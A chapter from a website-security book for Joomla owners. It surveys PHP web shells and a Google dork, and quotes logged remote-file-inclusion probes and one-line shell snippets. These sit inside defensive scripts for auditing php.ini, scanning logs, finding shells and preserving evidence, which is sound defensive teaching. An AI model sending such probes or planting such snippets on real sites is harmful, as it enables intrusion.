Chapter 6: How the Bad Guys Do It

This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008, 1010 SW High Ave., Topeka, 66604.

Zooming in on the tool bar, we see that the shell has several options listed under it. Selecting the FTP Quick brute will work to break the passwords on the site. Once this shell is inserted, possibly through a Trojan horse, the "owner" of the shell can break passwords and log in normally, thus avoiding any nastiness with log files showing weird traffic. Though he or she could easily wipe out the log files with this tool.

Next, you can learn all about the server: what hardware is running, and what the OS build, version, and patch levels are. One note: you will see that Open Base Dir is OFF (not secure). This is one way an attacker could enter the site. Remember our PHP settings? Here is an example where the shell is reporting the server security information. This information was obtained with one of the scanning scripts that report information about your environment.

What shell would be complete without its own ability to connect to your SQL server? The next screenshot is the Execution PHP-code box. The attacker can run PHP commands through this, perhaps as a launching-off point to attack another site. The IP would resolve back to your server, not theirs.

The real power of the command shell is shown in the following screenshot. It has a built-in list of commands ready to execute. Note the passwords, commands, writeable files and folders, configuration files, and more.

This shell has a very handy browsing tool, giving the perpetrator the ability to add, delete, or change files. It can browse all the way to the top root of the server.
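The shell's "Open Base Dir is OFF" report is exactly the kind of thing you should be finding yourself, before an intruder does. The following script is an added example and not code from the book: it reads a php.ini and lists the settings an attacker's shell would be glad to see. The chapter names only open_basedir; the other directives in the CHECKS table (allow_url_include, allow_url_fopen, display_errors, expose_php, disable_functions) are standard PHP hardening directives added here as an assumed checklist, and both sample ini files are constructed.

```python
"""php.ini audit: added example, not from the book.

The chapter points at one directive, open_basedir, that the shell reported
as OFF. The remaining checks are standard PHP hardening directives included
here as an assumed defender's checklist; adjust them to your own baseline.
"""
import re

def _off(value):
    """True when a directive is empty or explicitly disabled."""
    return value.strip().strip('"\'').lower() in ("", "off", "0", "false", "none", "no")

def _on(value):
    """True when a directive is explicitly enabled."""
    return value.strip().strip('"\'').lower() in ("on", "1", "true", "yes")

# PHP's compiled-in defaults, used when a directive is absent from the file
DEFAULTS = {"allow_url_fopen": "On", "display_errors": "On", "expose_php": "On"}

# directive -> (predicate that means "weak", why a defender cares)
CHECKS = {
    "open_basedir":      (_off, "PHP may read any path on the server; the shell's file browser walks to /"),
    "allow_url_include": (_on,  "include() of a remote URL succeeds (the ?id=http://... probes in the logs)"),
    "allow_url_fopen":   (_on,  "fopen()/file_get_contents() will fetch remote URLs"),
    "display_errors":    (_on,  "errors leak file paths and versions to every visitor"),
    "expose_php":        (_on,  "X-Powered-By header advertises the PHP version"),
    "disable_functions": (_off, "exec(), system(), passthru() and friends are all callable"),
}

def parse_php_ini(text):
    """Return {directive: value}; ';' starts a comment, [sections] are ignored, last setting wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        m = re.match(r"([A-Za-z0-9_.]+)\s*=\s*(.*)$", line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip()
    return settings

def audit(text):
    """Return [(directive, value_or_<unset>, why)] for every weak setting."""
    settings = parse_php_ini(text)
    findings = []
    for directive, (is_weak, why) in CHECKS.items():
        value = settings.get(directive, DEFAULTS.get(directive, ""))
        if is_weak(value):
            findings.append((directive, value or "<unset>", why))
    return findings

# Constructed sample resembling a lax shared-host php.ini (not any real host's file).
# expose_php is omitted on purpose: the compiled-in default is On, so it is still reported.
LAX_INI = """
[PHP]
engine = On
open_basedir =
allow_url_fopen = On
allow_url_include = On
display_errors = On
disable_functions =
"""

# Constructed hardened counterpart
HARDENED_INI = """
[PHP]
open_basedir = "/var/www/site:/tmp"
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
expose_php = Off
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen"
"""

if __name__ == "__main__":
    for name, ini in (("lax", LAX_INI), ("hardened", HARDENED_INI)):
        print(f"{name}: {len(audit(ini))} weak setting(s)")
        for directive, value, why in audit(ini):
            print(f"  {directive} = {value}: {why}")
```

Run it against the php.ini your host actually loads (the path is shown by phpinfo() under "Loaded Configuration File"); a setting that is not in the file at all is judged by PHP's built-in default, which is why the lax sample still reports expose_php.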
You can see that the Perms column gives you the ability to change any file or directory permission. My favorite part of this shell (warning: this is humor) is the following screenshot. These guys take their craft so seriously that they ask for feedback on the shell or hack, and on bugs.

But developers of legitimate commercial or open-source applications should also take their craft seriously to avoid instances of hacking. I have examined the source code of this and I can tell you this is a well-written and a very useful (albeit for bad) tool. The shell in the next screenshot is copyrighted by its developer, and is released under a different license than the earlier one. The images are copyrighted by the developers. I have not provided the names of either of the developers for obvious reasons.

Here is another command shell found through Google search. It has been sanitized to hide the ownership and source. It is as powerful as the last example, with a few "added" features that make this one even more powerful. The available screenshot is divided into the following four parts to have a clear and distinctive view. The next part that follows is this. Then the following details are displayed. Details about Databases and Net are shown in the following section of the original screenshot. When enlarged, this screenshot is a powerful control tool for servers and websites. This tool is almost usable for commercial purposes, more so than many of the popular administration tools available today.
This one has similar capabilities, giving the attacker control over files, permissions, passwords, and so on. It also has a built-in email engine.

The reason I have spent time showing you the shells is to make you aware of the danger lax security represents.

Finding Targets to Attack

A "Dork" is a Google search to locate targets. Those targets can be simply a specific version of an extension or a device such as a webcam on a specific port. Let us say a bad guy finds out that the extension is vulnerable from one of the many exploit or responsible disclosure sites. He or she could Google all the targets like this:

inurl:"/com_example/"

In this example, com_example would be the extension you are searching for. Once this search is run, it will yield a lovely list of targets. This sort of thing happens every time a new exploit is reported. Everyone rushes out to try and break into your site. You want to watch your logs for entries such as these:

http://www.yourdomain.com/index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt??
/?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt?
/poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http

These are three examples of recent attacks against a client's domain that I pulled out for this chapter. The top one is a common attack. The test.txt is meant to test your server and pull out variables to help them determine weaknesses. If your site is strengthened and properly configured using .htaccess and the other tools mentioned, it should dramatically lower the potential effect of this particular threat on your sites.

What Do I Do Then?
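Watching the logs by eye does not scale, so here is an added example (not from the book) that reads Apache access-log lines and flags the three patterns visible in the entries above: a parameter whose value is a remote URL, a parameter carrying PHP code such as include( or ${, and an attempt to set the Joomla 1.0 global mosConfig_absolute_path from the query string. The request strings in SAMPLE_LOG are the ones quoted in the chapter; the client IPs, timestamps and sizes around them are constructed, and the SENSITIVE_PARAMS list is an assumption you should extend for your own site.

```python
"""Flag remote-file-inclusion and code-injection probes in an Apache access log.

Added example, not from the book. The three request strings are the ones the
chapter quotes; the surrounding log lines (IPs, dates, sizes) are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined log: client IP, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# PHP fragments that never belong in a query-string value
CODE_INJECT = re.compile(
    r"(include|require|include_once|require_once|eval|exit|system|passthru)\s*\(|\$\{",
    re.IGNORECASE,
)
# Joomla 1.0 configuration globals an attacker may try to override (assumed list; extend it)
SENSITIVE_PARAMS = {"mosconfig_absolute_path"}

def inspect_request(target):
    """Return [(param, reason)] for one request target such as /index.php?a=b."""
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; a second pass catches double encoding
        if name.lower() in SENSITIVE_PARAMS:
            reasons.append((name, "attempt to override a Joomla configuration global"))
        if REMOTE_URL.match(value):
            reasons.append((name, "value is a remote URL (remote file inclusion probe)"))
        elif CODE_INJECT.search(value):
            reasons.append((name, "value contains PHP code"))
    return reasons

def scan_log(lines):
    """Return one finding dict per suspicious parameter across all parseable lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, reason in inspect_request(m.group("target")):
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "param": param, "reason": reason, "request": m.group("target")})
    return findings

def offenders(findings):
    """Count findings per client IP, the list you would feed a block rule."""
    return Counter(f["ip"] for f in findings)

# Constructed log lines wrapping the chapter's three quoted requests plus one normal hit
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2008:03:14:15 +0000] "GET /index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=http://www.XXXXXX.net/3333/read/test.txt?? HTTP/1.1" 200 512
203.0.113.5 - - [10/Dec/2008:03:14:16 +0000] "GET /?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt? HTTP/1.1" 200 512
198.51.100.9 - - [10/Dec/2008:03:14:17 +0000] "GET /poll/comments.php?id=%7B$%7Binclude($aaa)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http HTTP/1.1" 200 512
192.0.2.10 - - [10/Dec/2008:03:15:00 +0000] "GET /index.php?option=com_content&task=view&id=12&Itemid=3 HTTP/1.1" 200 8192
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h['ip']} {h['time']} param={h['param']}: {h['reason']}")
    print("per-IP counts:", dict(offenders(hits)))
```

The ordinary com_content request produces nothing, the two probes from 203.0.113.5 produce three findings between them (the second request trips both the configuration-global check and the remote-URL check), and the per-IP count is what you would hand to the "block nuisance IP addresses" step later in this chapter.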
First assess your own security as much as you can. Hire a professional to check your security after you're through. If you want to use the tools we discussed earlier in this chapter to protect and monitor yourself, a good place to start is your local library or book store, and the Internet. Educate yourself in these key areas:

• Networking
• DNS
• Very rudimentary TCP/IP
• Apache common log file format
• Basic PHP commands
• .htaccess includes
• php.ini includes
• The tools listed:
  ° NMAP
  ° Wireshark
• Basic Linux commands
• Hacker (read: the bad guys) sites
• Sites such as CERT.ORG

You will need to learn to have patience because as you start finding issues, you will want your host to fix them. They typically do not like interference and may get upset. Again, do not try anything in this chapter without the express permission of the owner of the computer, host, network, or website. In my opinion, NMAP should be one of the first tools you learn about. It provides you the highest degree of information about what is important to you.

Countermeasures

After you have conducted your own security scanning and patched your site, you will want to go about hardening your site. Here are some vital things:

• Close all unnecessary ports, or open ONLY the ones you need.
• Uninstall any extension not in use (mambot, plug-in, component, module).
• Uninstall FrontPage Services from shared hosting. If you are using Joomla!, you will not need FrontPage.
• Ensure that your host is at the latest patch levels for the OS and the associated moving parts such as Apache, OpenSSL, MySQL (version dependent), and PHP.
• Set your permissions as tightly as possible.
• Fine-tune your site through .htaccess and php.ini.
• If you allow uploads, limit the size and sequester them for testing.
• Check your log files frequently.
• Block specific countries that are known to be havens for attacks, IF you do not need traffic from those countries. See the final chapter in this book for a good way to find this information.
• Have an excellent disaster recovery and business continuity plan for your site.
• Back up tapes or CDs of your applications and data.
• License keys or serial numbers.
• Get the secondary host set up and ready.
• Consider Virtual Private Servers, as they help by protecting you from other shared hosts.
• Block nuisance IP addresses.
• Keep apprised of the latest techniques that are being used to break into sites.
• If you note ANY suspicious behavior from your website, contact your host and report a potential security incident.

But What If My Host Won't Cooperate?

Get a new host. It is that simple. Hosts are a dime a dozen and quite a few of them operate as if they don't care, and I have seen my share. They might have grown too fast, they might be resellers of larger hosting operations, they might not share your 'technical opinion'. So what? Get another host and be done with it.

What If My Website Is Broken into and Defaced?

• First, assess the damage.
• IMMEDIATELY make copies of all the logs you can find and remove the copy from the server. This could be useful for law enforcement reasons.
• Ensure that you have a backup. Now would be a good time for a full restoration.
• Contact your host and inform them of the "incident". If the tech is uncooperative, or tells you that it's your fault, ask for his or her supervisor and keep trying till you find someone who can help you out.
• If you don't have a backup, then:
  ° Check every file's permission.
  ° Check every index.php and index.htm or index.html for stuff that does not belong.
  ° Check for odd or increased traffic.
  ° Ask your host to run netstat and other tools to see if there are any processes running that should not be.
  ° Consider rebuilding the site from scratch, including removal of the old hosting account. Yes, it is that important.

What If a Rootkit Has Been Placed on My Server?

This is a vitally important issue. You will want to do a few things first:

• IMMEDIATELY obtain a full backup and understand that it may be full of viruses. This will help with the forensics and legal issues.
• Attempt to locate the rootkit. It may be known by several names:
  ° C99.php
  ° German.php
  ° Arab.php
  ° R57.php
  ° Tst.txt
  ° Or any .php file that looks like it doesn't belong
  ° Various .html or .htm files that don't belong
• Shut down your site from receiving or distributing traffic, by putting up a simple HTML webpage with a message for your visitors.
• Scan ALL of your PCs for Trojans and viruses.
• You are likely to be working against time at this point and your best bet may be to simply delete the account, move to a new host, and start over.

Why is the last option the best option even though it is drastic? Because if a rootkit has made it onto a shared server, it will take a full restoration or a newly-installed operating system on that physical server to wipe it out.
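"Attempt to locate the rootkit" and "check every file's permission" are tedious by hand on a site with thousands of files. The following script is an added example, not from the book: it walks a document root and flags files by the names listed above (C99.php, German.php, Arab.php, R57.php, Tst.txt), by content that looks like a shell, and by world-writable permissions. The name list is the chapter's; the content signatures and the permission check are assumed additions, and the site tree built in demo() is constructed. Treat every hit as a lead to inspect, not as proof.

```python
"""Look for web shells and rootkit droppings in a site's document root.

Added example, not from the book. The file names come from the chapter's
list (C99.php, German.php, Arab.php, R57.php, Tst.txt); the content
signatures and the world-writable check are assumed additions.
"""
import os
import re
import tempfile

KNOWN_SHELL_NAMES = {"c99.php", "german.php", "arab.php", "r57.php", "tst.txt"}
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".inc"}

# Byte patterns typical of PHP shells; false positives are possible, so treat hits as leads
SIGNATURES = [
    ("obfuscated code execution",
     re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("request data passed to a shell",
     re.compile(rb"(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)", re.I)),
]

def scan_file(path):
    """Return the list of reasons this file deserves a look (empty when clean)."""
    reasons = []
    name = os.path.basename(path).lower()
    if name in KNOWN_SHELL_NAMES:
        reasons.append("file name matches a known shell name")
    try:
        with open(path, "rb") as f:
            data = f.read(2_000_000)  # first 2 MB is enough for a signature pass
        if os.stat(path).st_mode & 0o002:
            reasons.append("world-writable")
    except OSError:
        return reasons
    if os.path.splitext(name)[1] not in SCRIPT_EXT and b"<?php" in data:
        reasons.append("PHP code inside a non-PHP file")
    for label, sig in SIGNATURES:
        if sig.search(data):
            reasons.append(label)
    return reasons

def scan_tree(root):
    """Walk root and return [(path, reasons)] for every flagged file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            p = os.path.join(dirpath, fn)
            reasons = scan_file(p)
            if reasons:
                findings.append((p, reasons))
    return findings

def demo():
    """Build a constructed site tree in a temp dir, scan it, return {relative path: reasons}."""
    files = {  # constructed contents, not real shells
        "index.php": b"<?php echo 'hello'; ?>",
        "images/c99.php": b"<?php /* dropped shell, body omitted */ ?>",
        "uploads/avatar.php": b"<?php eval(base64_decode($_POST['x'])); ?>",
        "cache/tst.txt": b"<?php system($_GET['cmd']); ?>",
        "components/helper.php": b"<?php function f() { return 1; } ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            p = os.path.join(root, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as f:
                f.write(body)
            os.chmod(p, 0o644)  # sane baseline regardless of the process umask
        os.chmod(os.path.join(root, "components/helper.php"), 0o666)  # the one "loose" file
        return {os.path.relpath(p, root): r for p, r in scan_tree(root)}

if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(f"{rel}: {', '.join(reasons)}")
```

On a real site, point scan_tree at the document root and run it from a clean machine against the copy you preserved, not only on the compromised host, because a rootkit can hide files from tools run on the server itself.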
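Both incident lists above start with the same step: immediately copy every log and the full backup off the server, because they may be needed for forensics and law enforcement. This added example, not from the book, does that step with a hash manifest so the copy can later be shown to be unaltered. It tars the named logs, records a SHA-256 per file and for the archive, writes a JSON manifest, and can re-verify the copy later. The log contents used in demo() are constructed.

```python
"""Preserve a copy of the logs with a hash manifest before touching the server.

Added example, not from the book: it implements the chapter's advice to copy
every log immediately and keep the copy off the server, adding SHA-256 hashes
so the copy can later be shown to be unaltered. The log contents in demo()
are constructed.
"""
import hashlib
import json
import os
import tarfile
import tempfile
import time

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def preserve_logs(log_paths, dest_dir, label="incident"):
    """Tar the logs into dest_dir, hash each one and the archive, write a JSON manifest, return it."""
    os.makedirs(dest_dir, exist_ok=True)
    stamp = time.strftime("%Y%m%dT%H%M%SZ", time.gmtime())
    archive = os.path.join(dest_dir, f"{label}-{stamp}.tar.gz")
    manifest = {"created_utc": stamp, "files": {}}
    with tarfile.open(archive, "w:gz") as tar:
        for p in log_paths:
            manifest["files"][p] = {"sha256": sha256_file(p), "size": os.path.getsize(p)}
            tar.add(p, arcname=p.lstrip("/"))  # keep the full path, minus the leading slash
    manifest["archive"] = {"path": archive, "sha256": sha256_file(archive)}
    with open(archive + ".manifest.json", "w") as f:
        json.dump(manifest, f, indent=2)
    return manifest

def verify_archive(manifest):
    """Re-hash the archive and every member; True only if nothing has changed since preservation."""
    info = manifest["archive"]
    if sha256_file(info["path"]) != info["sha256"]:
        return False
    with tempfile.TemporaryDirectory() as tmp, tarfile.open(info["path"], "r:gz") as tar:
        try:
            tar.extractall(tmp, filter="data")  # refuse absolute paths, links, etc.
        except TypeError:  # Python builds without the filter argument
            tar.extractall(tmp)
        for original, entry in manifest["files"].items():
            if sha256_file(os.path.join(tmp, original.lstrip("/"))) != entry["sha256"]:
                return False
    return True

def demo():
    """Run the whole flow on constructed log files and report what the checks returned."""
    access = (b'203.0.113.5 - - [10/Dec/2008:03:14:16 +0000] '
              b'"GET /?mosConfig_absolute_path=http://xxxxx.yyyyyyyyyyy.pt/test.txt? HTTP/1.1" 200 512\n')
    error = b"[Wed Dec 10 03:14:16 2008] [error] PHP Warning: include(): failed to open stream\n"
    with tempfile.TemporaryDirectory() as work:
        logs = []
        for name, body in (("access.log", access), ("error.log", error)):
            p = os.path.join(work, name)
            with open(p, "wb") as f:
                f.write(body)
            logs.append(p)
        manifest = preserve_logs(logs, os.path.join(work, "evidence"))
        intact = verify_archive(manifest)
        with open(manifest["archive"]["path"], "ab") as f:  # simulate a modified copy
            f.write(b"\x00")
        return {"files": len(manifest["files"]), "intact": intact,
                "tamper_detected": not verify_archive(manifest)}

if __name__ == "__main__":
    print(demo())
```

Write dest_dir somewhere that is not the web server (a mounted USB stick, or a directory you then download and delete), and keep the manifest with the archive: the hashes are what let you show later that the copy matches what was taken from the host.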